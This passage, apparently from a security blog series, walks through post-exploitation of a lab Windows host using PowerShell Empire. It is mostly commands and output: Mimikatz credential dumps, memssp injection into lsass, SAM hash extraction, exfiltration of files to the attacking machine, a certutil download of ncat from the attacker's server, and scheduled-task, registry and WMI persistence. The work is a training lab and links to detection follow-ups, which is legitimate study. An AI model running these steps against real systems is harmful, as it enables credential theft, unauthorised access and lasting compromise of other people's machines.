Now that is progress.

Even more progress. Looking at the agent log.

2021-11-20 18:49:54 : 
tasked agent 8XW5324B to run module Invoke-Mimikatz DumpCreds

2021-11-20 18:50:37 : 
Job started: B61KRZ

2021-11-20 18:51:38 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                                 
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz                                                                  
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com ) 
'#####'        > https://pingcastle.com / https://mysmartlogon.com ***/                                                
                                                                                                                         
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 3548381 (00000000:003624dd) 
Session           : Service from 0 
User Name         : DefaultAppPool  
Domain            : IIS APPPOOL 
Logon Server      : (null)    
Logon Time        : 11/20/2021 5:55:46 PM                                                                                
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
        tspkg :
        wdigest :
         * Username : SEC560STUDENT$
         * Domain   : SEC560
         * Password : (null)
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 458925 (00000000:000700ad)
Session           : Interactive from 1
User Name         : sec560
Domain            : SEC560STUDENT
Logon Server      : SEC560STUDENT
Logon Time        : 11/20/2021 4:54:39 PM
SID               : S-1-5-21-2977773840-2930198165-1551093962-1202
        msv :
         [00000003] Primary
         * Username : sec560
         * Domain   : SEC560STUDENT
         * NTLM     : 7abdbb1631d1674637aa354c4b4dd273
         * SHA1     : 29282a5203a2e5444ef3053f6ba4943bbb0e3fc4
        tspkg :
        wdigest :
         * Username : sec560
         * Domain   : SEC560STUDENT
         * Password : (null)
        kerberos :
         * Username : sec560
         * Domain   : SEC560STUDENT
         * Password : (null)
        ssp :
        credman :
        cloudap :

...

mimikatz(powershell) # exit
Bye!

Looking at credentials seen by Powershell-Empire.

(Empire: SANS560HighPrivBypassUAC) > credentials

┌Credentials────┬───────────────┬──────────┬───────────────┬──────────────────────────────────┬─────┬─────────────────────────────────┬─────────────────────┐
│ ID │ CredType │ Domain        │ UserName │ Host          │ Password/Hash                    │ SID │ OS                              │ Notes               │
├────┼──────────┼───────────────┼──────────┼───────────────┼──────────────────────────────────┼─────┼─────────────────────────────────┼─────────────────────┤
│ 1  │ hash     │ SEC560STUDENT │ sec560   │ Sec560Student │ 7abdbb1631d1674637aa354c4b4dd273 │     │ Microsoft Windows 10 Enterprise │ 2021-11-20 18:51:38 │
└────┴──────────┴───────────────┴──────────┴───────────────┴──────────────────────────────────┴─────┴─────────────────────────────────┴─────────────────────┘

Injecting the memssp module into lsass.exe. This allows the credentials for any user to be written to the C:\Windows\System32\mimisla.log log file on the host.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/misc/memssp
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/misc/memssp) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 2

Looking at the agent.log.

2021-11-20 19:06:32 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz memssp

2021-11-20 19:07:47 : 
Job started: 7YP5T4

2021-11-20 19:08:47 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # misc::memssp
Injected =)

memssp installed, check C:\Windows\System32\mimisla.log for logon events.

Connecting to the shell on the host to view the mimilisa.log file.

(Empire: SANS560HighPrivBypassUAC) > shell
[*] Exit Shell Menu with Ctrl+C
(SANS560HighPrivBypassUAC) C:\WINDOWS\system32 > cmd.exe /c "type c:\windows\system32\mimisla.log"
(SANS560HighPrivBypassUAC) C:\WINDOWS\system32 >

Looking at the agent.log file.

2021-11-20 19:13:16 : 
tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimisla.log"

2021-11-20 19:13:49 : 


2021-11-20 19:17:44 : 
tasked agent 8XW5324B to run command cmd.exe /c "type c:\windows\system32\mimilsa.log"

2021-11-20 19:17:50 : 
[00000000:00d9afac] SEC560STUDENT\sec560        sec560
[00000000:00d9afd7] SEC560STUDENT\sec560        sec560
[00000000:010ced5a] SEC560STUDENT\sec560        sec560
[00000000:010ceec4] SEC560STUDENT\sec560        sec560

Grabbing the Security Accounts Manager (SAM) Database.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/credentials/mimikatz/sam
[*] Set Agent to SANS560HighPrivBypassUAC

┌Record Options────────────────────┬──────────┬─────────────────────────┐
│ Name  │ Value                    │ Required │ Description             │
├───────┼──────────────────────────┼──────────┼─────────────────────────┤
│ Agent │ SANS560HighPrivBypassUAC │ True     │ Agent to run module on. │
└───────┴──────────────────────────┴──────────┴─────────────────────────┘

(Empire: usemodule/powershell/credentials/mimikatz/sam) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 6

As always, reviewing the agent.log.

2021-11-20 19:22:27 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Mimikatz SAM dump

2021-11-20 19:23:04 : 
Job started: VTZ9NY

2021-11-20 19:24:05 : 
Hostname: Sec560Student / S-1-5-21-2977773840-2930198165-1551093962

  .#####.   mimikatz 2.2.0 (x64) #19041 Jun  9 2021 18:55:28
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

584     {0;000003e7} 1 D 42955          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -> Impersonated !
 * Process Token : {0;0007007d} 1 F 8903583     SEC560STUDENT\sec560    S-1-5-21-2977773840-2930198165-1551093962-1202  (14g,24p)        Primary
 * Thread Token  : {0;000003e7} 1 D 17857121    NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(powershell) # lsadump::sam
Domain : SEC560STUDENT
SysKey : e2a5379f049ff5f37e322618f569e020
Local SID : S-1-5-21-2977773840-2930198165-1551093962

SAMKey : e40f50ec79bc899e9e73681cc1f1ef10

RID  : 000001f4 (500)
User : Administrator

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 9679f78eec859fdedb8c208c8fcf4abf

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 118e9239b1e3131c604aed931a6483ce

* Primary:Kerberos-Newer-Keys *
    Default Salt : SEC504STUDENTWDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 4ad74d67e523c7f6715edb2d899c236f6d1e315470fe74249262b923ab006874
      aes128_hmac       (4096) : a2f2ec30564c95960931d0480acb9220
      des_cbc_md5       (4096) : 46a82389e0649e1c

...

* Primary:Kerberos-Newer-Keys *
    Default Salt : SEC560STUDENTnotadmin
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 7b462c5e57de3a5fae465b5288b3cafd4550b99e179cf5c31f51cac45d42c0e3
      aes128_hmac       (4096) : 08926d92cb36e12aeabdf81cdc238131
      des_cbc_md5       (4096) : fd1a079dd0b94cbc

...

mimikatz(powershell) # token::revert
 * Process Token : {0;0007007d} 1 F 8903583     SEC560STUDENT\sec560    S-1-5-21-2977773840-2930198165-1551093962-1202  (14g,24p)        Primary
 * Thread Token  : no token

Grabbing credentials with Rubeus

2021-11-20 19:30:53 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Rubeus

2021-11-20 19:31:07 : 
Administrator:500:24d666dff420a669de4afb2f96b214dd:372c5f8eb6a2e4b07caa7a4d5d7bcf30:::
Guest:501:edb8bd2a41d54ed296c4a6ca3e9ec80f:882b4fb7507002487e96831d1297822f:::
DefaultAccount:503:e455c45a5adc07078973696d3f86c447:2545ae7899dec24956cc2a248e974601:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9679f78eec859fdedb8c208c8fcf4abf:::
sec560:1202:aad3b435b51404eeaad3b435b51404ee:7abdbb1631d1674637aa354c4b4dd273:::
notadmin:1203:aad3b435b51404eeaad3b435b51404ee:c62638b38308e651b21a0f2ccab3ac9b:::
clark:1210:aad3b435b51404eeaad3b435b51404ee:594bb6d6d86a285ea1c8b04fd1f306e9:::
john:1211:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Now that we have credentials, time to move on.

6. Capturing packets

Time to capture some packets, so that we can analyze later to see what is going on on this host.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/collection/packet_capture
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/collection/packet_capture) > set MaxSize 1MB
[*] Set MaxSize to 1MB

(Empire: usemodule/powershell/collection/packet_capture) > set TraceFile c:\\tmp\\capture.etl
[*] Set TraceFile to c:\tmp\capture.etl

(Empire: usemodule/powershell/collection/packet_capture) > options

┌Record Options─────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name       │ Value                    │ Required │ Description                         │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent      │ SANS560HighPrivBypassUAC │ True     │ Agent to run module on.             │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ MaxSize    │ 1MB                      │ True     │ Maximum size of capture file. Blank │
│            │                          │          │ for no limit.                       │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ Persistent │                          │ False    │ Switch. Persist capture across      │
│            │                          │          │ reboots.                            │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ StopTrace  │                          │ False    │ Switch. Stop trace capture.         │
├────────────┼──────────────────────────┼──────────┼─────────────────────────────────────┤
│ TraceFile  │ c:\tmp\capture.etl      │ True     │ File to log the capture out to.     │
└────────────┴──────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/collection/packet_capture) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 9

Looking at the agent.log.

2021-11-20 19:45:10 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-PacketCapture

2021-11-20 19:45:16 : 

Trace configuration:
-------------------------------------------------------------------
Status:             Running
Trace File:         C:\tmp\capture.etl
Append:             Off
Circular:           On
Max Size:           1 MB
Report:             Off

Stopping the trace.

(Empire: usemodule/powershell/collection/packet_capture) > set StopTrace True
[*] Set StopTrace to True
(Empire: usemodule/powershell/collection/packet_capture) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 17

Looking at the agent.log.

2021-11-20 21:06:05 : 
Merging traces ... done
Generating data collection ... done
The trace file and additional troubleshooting information have been compiled as "c:\tmp\capture.cab".
File location = c:\tmp\capture.etl
Tracing session was successfully stopped.

7. Downloading contents - Exfiltration

Using the download option

(Empire: usemodule/powershell/collection/packet_capture) > interact SANS560HighPrivBypassUAC
[*] Task 12 results received
(Empire: SANS560HighPrivBypassUAC) >

Downloading all contents within the c:\tmp\ directory

(Empire: SANS560HighPrivBypassUAC) > download c:\\tmp\\*.*
[*] Tasked SANS560HighPrivBypassUAC to run Task 18

Powershell-empire server console shows

[+] Part of file build1.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file build2.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file capture.cab from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file capture.etl from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file launcher.xml from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file MSBuild.exe from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp
[+] Part of file test.txt from 8XW5324B saved [100.0%] to /var/lib/powershell-empire//downloads/8XW5324B/C:/tmp

Looking at the agent.log ...

2021-11-20 21:12:02 : 
Tasked agent to download c:\tmp\*.*

2021-11-20 21:12:06 : 
file download: C:\tmp\build1.xml, part: 0

2021-11-20 21:13:07 : 
file download: C:\tmp\build2.xml, part: 0

2021-11-20 21:14:08 : 
file download: C:\tmp\capture.cab, part: 0

2021-11-20 21:15:12 : 
file download: C:\tmp\capture.etl, part: 0

2021-11-20 21:16:12 : 
file download: C:\tmp\launcher.xml, part: 0

2021-11-20 21:17:13 : 
file download: C:\tmp\MSBuild.exe, part: 0

2021-11-20 21:18:13 : 
file download: C:\tmp\test.txt, part: 0

2021-11-20 21:19:13 : 
[*] File download of C:\tmp\build1.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\build2.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\capture.cab completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\capture.etl completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\launcher.xml completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\MSBuild.exe completed

2021-11-20 21:19:14 : 
[*] File download of C:\tmp\test.txt completed

Confirming the files were successfully downloaded and are now stored on our attacking machine.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# ls /var/lib/powershell-empire/downloads/8XW5324B/C\:/tmp/ -l
total 1720
-rw-r--r-- 1 root root     833 Nov 20 21:12 build1.xml
-rw-r--r-- 1 root root    3951 Nov 20 21:13 build2.xml
-rw-r--r-- 1 root root  432248 Nov 20 21:14 capture.cab
-rw-r--r-- 1 root root 1048576 Nov 20 21:15 capture.etl
-rw-r--r-- 1 root root    3941 Nov 20 21:16 launcher.xml
-rw-r--r-- 1 root root  261688 Nov 20 21:17 MSBuild.exe
-rw-r--r-- 1 root root      17 Nov 20 21:18 test.txt

There we go, with a successful exfiltration.

8. Uploading contents to the host.

I was having some problems with the upload module. Not sure what I was doing wrong.

Looking at the help, this is what it shows.

(Empire: 8XW5324B) > upload --help
        Tasks an the specified agent to upload a file.

        Usage: upload <local_file_directory> [destination_file_name]

However, none of my activities generated a new task. For example, I tried the following 2 strategies:

(Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe c:\\tmp\\ncat.exe
(Empire: 73H864SX) > upload /home/securitynik/WinTools/ncat.exe

None of the upload I did generated a task. So I tried another method to get the file unto the file system. I guess whatever works is all that matters.

Hosted my file using Python SimpleHTTPServer:

┌──(root💀securitynik)-[/home/securitynik/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Dropping to the shell and executing Certutil.

(Empire: 73H864SX) > shell
[*] Exit Shell Menu with Ctrl+C
(73H864SX)  > cmd.exe /c "certutil -URLCache -F http://10.0.0.107:80/ncat.exe ncat.exe"

Looking at the Python HTTP Server I see the file has been successfully download.

┌──(root💀securitynik)-[/home/securitynik/WinTools]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 -
10.0.0.110 - - [21/Nov/2021 18:51:04] "GET /ncat.exe HTTP/1.1" 200 -

Reviewing the agent.log, I see.

2021-11-21 18:50:29 : 
tasked agent 73H864SX to run command certutil -URLCache -F http://10.0.0.107:80/ncat.exe c:\tmp\ncat.exe

2021-11-21 18:51:04 : 
****  Online  ****
CertUtil: -URLCache command completed successfully.

Running dir on the host to confirm the file was successfully downloaded.

(73H864SX)  > dir c:\tmp\ncat.exe
Mode   Owner               LastWriteTime           Length Name    
----   -----               -------------           ------ ----    
-a---- NT AUTHORITY\SYSTEM 11/21/2021 10:38:27 PM 1667584 ncat.exe

While I was unable to get the upload feature of Powershell Empire to work, I was still able to achieve my objective.

9. Persistence

For persistence, I like schedule tasks, as it allows you to have predictability, in controlling how and when your malicious code can execute

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/schtasks
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set OnLogon True
[*] Set OnLogon to True

(Empire: usemodule/powershell/persistence/elevated/schtasks) > set UserAgent Securitynik-Persistence-Schtasks-UserAgent
[*] Set UserAgent to Securitynik-Persistence-Schtasks-UserAgent

(Empire: usemodule/powershell/persistence/elevated/schtasks) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ADSPath          │                                     │ False    │ Alternate-data-stream location to   │
│                  │                                     │          │ store the script code.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560HighPrivBypassUAC            │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup          │                                     │ False    │ Switch. Cleanup the trigger and any │
│                  │                                     │          │ script from specified location.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DailyTime        │ 09:00                               │ False    │ Daily time to trigger the script    │
│                  │                                     │          │ (HH:mm).                            │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile          │                                     │ False    │ Use an external file for the        │
│                  │                                     │          │ payload instead of a stager.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ IdleTime         │                                     │ False    │ User idle time (in minutes) to      │
│                  │                                     │          │ trigger script.                     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ False    │ Listener to use.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ OnLogon          │ True                                │ False    │ Switch. Trigger script on user      │
│                  │                                     │          │ logon.                              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ RegPath          │ HKLM:\Software\Microsoft\Network\de │ False    │ Registry location to store the      │
│                  │ bug                                 │          │ script code. Last element is the    │
│                  │                                     │          │ key name.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ TaskName         │ SecurityNik-Empire-Schtask          │ True     │ Name to use for the schtask.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ Securitynik-Persistence-Schtasks-   │ False    │ User-agent string to use for the    │
│                  │ UserAgent                           │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │
└──────────────────┴─────────────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/schtasks) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 19

Looking at the agent.log.

2021-11-20 21:33:56 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Schtasks

2021-11-20 21:34:16 : 
SUCCESS: The scheduled task "SecurityNik-Empire-Schtask" has successfully been created.
Schtasks persistence established using listener http stored in HKLM:\Software\Microsoft\Network\debug with SecurityNik-Empire-Schtask OnLogon trigger.

Leveraging the registry persistence.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/registry
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/registry) >  set UserAgent SecurityNik-Registry-Persistence
[*] Set UserAgent to SecurityNik-Registry-Persistence

(Empire: usemodule/powershell/persistence/elevated/registry) > set Listener http
[*] Set Listener to http

(Empire: usemodule/powershell/persistence/elevated/registry) > options

┌Record Options────┬─────────────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name             │ Value                               │ Required │ Description                         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ADSPath          │                                     │ False    │ Alternate-data-stream location to   │
│                  │                                     │          │ store the script code.              │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent            │ SANS560HighPrivBypassUAC            │ True     │ Agent to run module on.             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Bypasses         │ mattifestation etw                  │ False    │ Bypasses as a space separated list  │
│                  │                                     │          │ to be prepended to the launcher.    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup          │                                     │ False    │ Switch. Cleanup the trigger and any │
│                  │                                     │          │ script from specified location.     │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile          │                                     │ False    │ Use an external file for the        │
│                  │                                     │          │ payload instead of a stager.        │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ KeyName          │ Updater                             │ True     │ Key name for the run trigger.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener         │ http                                │ False    │ Listener to use.                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Obfuscate        │ False                               │ False    │ Switch. Obfuscate the launcher      │
│                  │                                     │          │ powershell code, uses the           │
│                  │                                     │          │ ObfuscateCommand for obfuscation    │
│                  │                                     │          │ types. For powershell only.         │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ObfuscateCommand │ Token\All\1                         │ False    │ The Invoke-Obfuscation command to   │
│                  │                                     │          │ use. Only used if Obfuscate switch  │
│                  │                                     │          │ is True. For powershell only.       │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy            │ default                             │ False    │ Proxy to use for request (default,  │
│                  │                                     │          │ none, or other).                    │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds       │ default                             │ False    │ Proxy credentials                   │
│                  │                                     │          │ ([domain\]username:password) to use │
│                  │                                     │          │ for request (default, none, or      │
│                  │                                     │          │ other).                             │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ RegPath          │ HKLM:SOFTWARE\Microsoft\Windows\Cur │ False    │ Registry location to store the      │
│                  │ rentVersion\Debug                   │          │ script code. Last element is the    │
│                  │                                     │          │ key name.                           │
├──────────────────┼─────────────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent        │ SecurityNik-Registry-Persistence    │ False    │ User-agent string to use for the    │
│                  │                                     │          │ staging request (default, none, or  │
│                  │                                     │          │ other).                             │

(Empire: usemodule/powershell/persistence/elevated/registry) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 21

Looking at the agent.log.

2021-11-20 21:51:27 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-Registry

2021-11-20 21:52:18 : 
Registry persistence established using listener http stored in HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug.

Finally, persistence via WMI.

(Empire: SANS560HighPrivBypassUAC) > usemodule powershell/persistence/elevated/wmi
[*] Set Agent to SANS560HighPrivBypassUAC

(Empire: usemodule/powershell/persistence/elevated/wmi) >  set UserAgent SecurityNik-WMI-Persistence
[*] Set UserAgent to SecurityNik-WMI-Persistence

(Empire: usemodule/powershell/persistence/elevated/wmi) > set DailyTime 09:00
[*] Set DailyTime to 09:00

(Empire: usemodule/powershell/persistence/elevated/wmi) > set Listener http
[*] Set Listener to http


(Empire: usemodule/powershell/persistence/elevated/wmi) > options

┌Record Options─────────────────────────────┬──────────┬─────────────────────────────────────┐
│ Name        │ Value                       │ Required │ Description                         │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Agent       │ SANS560HighPrivBypassUAC    │ True     │ Agent to run module on.             │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ AtStartup   │ True                        │ False    │ Switch. Trigger script (within 5    │
│             │                             │          │ minutes) of system startup.         │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Cleanup     │                             │ False    │ Switch. Cleanup the trigger and any │
│             │                             │          │ script from specified location.     │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ DailyTime   │ 09:00                       │ False    │ Daily time to trigger the script    │
│             │                             │          │ (HH:mm).                            │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ExtFile     │                             │ False    │ Use an external file for the        │
│             │                             │          │ payload instead of a stager.        │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ FailedLogon │                             │ False    │ Trigger script with a failed logon  │
│             │                             │          │ attempt from a specified user       │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Listener    │ http                        │ True     │ Listener to use.                    │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ Proxy       │ default                     │ False    │ Proxy to use for request (default,  │
│             │                             │          │ none, or other).                    │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ ProxyCreds  │ default                     │ False    │ Proxy credentials                   │
│             │                             │          │ ([domain\]username:password) to use │
│             │                             │          │ for request (default, none, or      │
│             │                             │          │ other).                             │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ SubName     │ Updater                     │ True     │ Name to use for the event           │
│             │                             │          │ subscription.                       │
├─────────────┼─────────────────────────────┼──────────┼─────────────────────────────────────┤
│ UserAgent   │ SecurityNik-WMI-Persistence │ False    │ User-agent string to use for the    │
│             │                             │          │ staging request (default, none, or  │
│             │                             │          │ other).                             │
└─────────────┴─────────────────────────────┴──────────┴─────────────────────────────────────┘

(Empire: usemodule/powershell/persistence/elevated/wmi) > execute
[*] Tasked SANS560HighPrivBypassUAC to run Task 22

Looking at the agent.log file.

2021-11-20 22:10:58 : 
tasked agent SANS560HighPrivBypassUAC to run module Invoke-WMI

2021-11-20 22:11:20 : 
WMI persistence established using listener http WMI subscription daily trigger at 09:00.

10. That's it.

2021-11-21 19:14:07 : 
[!] Agent 73H864SX exiting: past killdate

There is so much more than can be learned here. However, this is enough for me at this point. I believe I have achieved my objective.

Other posts in this series:

Beginning Powershell Empire - The Attack in 10 steps
Powershell Empire Log Analysis
Powershell Empire Packet Analysis
Powershell Empire Detection with Snort
Powershell Empire - Detection with Zeek

References:
https://www.powershellempire.com/?page_id=110
http://www.powershellempire.com/?page_id=147
http://www.powershellempire.com/?page_id=104
https://hackmag.com/security/powershell-empire/
http://www.powershellempire.com/?page_id=378
https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/
https://labs.f-secure.com/blog/attack-detection-fundamentals-c2-and-exfiltration-lab-1/
https://www.ivoidwarranties.tech/posts/pentesting-tuts/empire/guide/
https://www.hackingarticles.in/hacking-with-empire-powershell-post-exploitation-agent/